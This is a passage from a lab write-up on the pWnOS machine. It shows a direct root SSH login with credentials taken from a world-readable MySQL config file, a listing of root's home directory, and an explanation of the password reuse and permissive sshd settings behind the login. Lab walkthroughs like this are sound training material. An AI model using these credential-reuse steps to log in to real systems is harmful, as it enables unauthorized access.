With this information in hand, let’s utilize the Secure Shell (SSH) service to establish a connection using these credentials. 

┌──(kali㉿kali)-[~]
└─$ ssh root@192.168.95.27
The authenticity of host '192.168.95.27 (192.168.95.27)' can't be established.
ECDSA key fingerprint is SHA256:EWPtTr0Xn9NMudUhcD3+AMXSigXAGS4uldZp3grLm8w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.95.27' (ECDSA) to the list of known hosts.
root@192.168.95.27's password: 

Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Sun May 26 17:37:34 EDT 2024

  System load:  0.0               Processes:           81
  Usage of /:   2.9% of 38.64GB   Users logged in:     1
  Memory usage: 13%               IP address for eth0: 192.168.95.27
  Swap usage:   0%

Graph this data and manage this system at https://landscape.canonical.com/

Last login: Sun May 26 16:59:06 2024
root@web:~# 

The login succeeded and dropped me straight into a root shell, so no privilege escalation was needed. Two weaknesses combined here: the MySQL password sitting in a world-readable config file is also the OS root password, and sshd on this host still accepts password logins for root.

root@web:~# ls -al
total 32
drwx------  4 root root 4096 2011-05-09 19:25 .
drwxr-xr-x 21 root root 4096 2011-05-07 13:37 ..
drwx------  2 root root 4096 2011-05-07 15:12 .aptitude
-rw-r--r--  1 root root  107 2011-05-09 19:29 .bash_history
-rw-r--r--  1 root root 3106 2010-10-21 08:47 .bashrc
drwx------  2 root root 4096 2011-05-07 17:18 .cache
-rw-r--r--  1 root root    0 2011-05-09 19:24 .mysql_history
-rw-r--r--  1 root root  140 2010-10-21 08:47 .profile
-rw-------  1 root root  837 2011-05-09 19:16 .viminfo
root@web:~#

After looking through root's home directory and the rest of the system, I did not find any flags, so this pWnOS machine has no flag to capture; obtaining root is the goal.

If you have any questions or uncertainties regarding the steps outlined in this video, please feel free to ask in the comments section below.
